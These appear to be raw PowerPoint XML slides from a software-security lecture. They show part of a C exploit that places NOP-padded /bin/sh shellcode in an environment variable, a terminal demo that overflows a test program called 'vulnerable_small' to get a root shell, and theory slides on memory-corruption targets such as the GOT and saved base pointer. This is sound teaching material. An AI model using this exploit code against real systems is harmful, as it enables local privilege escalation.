                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>+=4)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addr_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>++) =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 Now it fills in the egg */ </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egg;</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EGGSIZE -	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) -1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</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NOP;</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>     buff[BSIZE - 1] = '\0';</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  egg[EGGSIZE -1] = '\0';</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memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(egg, "EGG=",4);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putenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(egg);</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memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(buff, "RET=",4);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putenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(buff);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  system("/bin/bash");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1721733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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Delivering the “Egg” Through the Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571397" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>create_env_egg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	USER=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>EGG=[…binary garbage]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ë</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>­^‰v1ÀˆF‰FÍ€1Û‰Ø@Í€èÜÿÿÿ/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>MAIL=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/spool/mail/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>INPUTRC=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>inputrc</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>RET=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>öÿ¿öÿ¿öÿ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>¿[… repeated many times…]¿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>öÿ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>¿¿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>öÿ</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>BASH_ENV=/home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bashrc</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>LANG=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>en_US</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>DISPLAY=:0</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vulnerable_small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> $RET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5615256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Memory Corruption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return address/frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointer to function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointer to data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Variable value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What causes the overwrite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unchecked copying overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Array indexing overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loop overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where is overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap/BSS/DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GOT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dtors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25534935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What Is Overwritten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="623619" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any reference to a value that can be overwritten can represent a security vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing the value of a variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointers to strings or array contents (e.g., “/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>t.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” becomes “/etc/shadow”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer values (e.g., value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> variable that is passed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing the value of the saved base pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By overwriting the old base pointer, it is possible to force the process to use a function frame determined by the attacker when returning from a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An additional return operation would jump to a destination selected by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing the value of a function pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing the value of the GOT entry for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() to point to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will invoke the code when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() is called</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273511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E455-4B44-FE40-9DCF-66E9DA970791}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Linux Access Control System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66FD0E8D-328F-FEAF-71ED-F4147C055EA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux philosophy: Everything is a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identities/Roles: Users and groups </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Subjects: Processes and threads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objects: Files, directories, devices, memory, ports, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
